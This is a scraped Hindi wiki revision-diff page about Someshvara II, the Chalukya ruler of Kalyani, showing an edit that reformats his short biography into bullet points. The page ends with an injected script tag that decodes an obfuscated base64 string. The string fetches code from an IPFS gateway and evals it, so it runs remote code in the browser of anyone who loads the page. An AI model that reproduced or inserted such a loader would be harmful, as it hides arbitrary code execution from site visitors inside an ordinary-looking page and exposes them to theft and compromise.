Difference between revisions of "सोमेश्वर द्वितीय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "॰" to ".")
Line 1: Line 1:
सोमेश्वर द्वितीय कल्याणी के चालुक्य सम्राट [[सोमेश्वर प्रथम]] का पुत्र और उत्तराधिकारी था। वह [[चालुक्य वंश]] का शासक था। उसने केवल चार वर्ष (1072-76 ई.) तक राज्य किया और तदुपरान्त उसके भाई विक्रमादित्य षष्ठ ने उसको अपदस्थ कर दिया।  
+
*सोमेश्वर द्वितीय कल्याणी के चालुक्य सम्राट [[सोमेश्वर प्रथम]] का पुत्र और उत्तराधिकारी था।  
 +
*वह [[चालुक्य वंश]] का शासक था।  
 +
*उसने केवल चार वर्ष (1072-76 ई.) तक राज्य किया और तदुपरान्त उसके भाई विक्रमादित्य षष्ठ ने उसको अपदस्थ कर दिया।
 +
==संबंधित लेख==
 +
{{चालुक्य साम्राज्य}}
 
[[Category:दक्षिण भारत के साम्राज्य]][[Category:इतिहास कोश]]__INDEX__
 
[[Category:दक्षिण भारत के साम्राज्य]][[Category:इतिहास कोश]]__INDEX__

Revision as of 09:44, 21 May 2011

  • someshvar dvitiy kalyani ke chaluky samrat someshvar pratham ka putr aur uttaradhikari tha.
  • vah chaluky vansh ka shasak tha.
  • usane keval char varsh (1072-76 ee.) tak rajy kiya aur taduparant usake bhaee vikramadity shashth ne usako apadasth kar diya.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>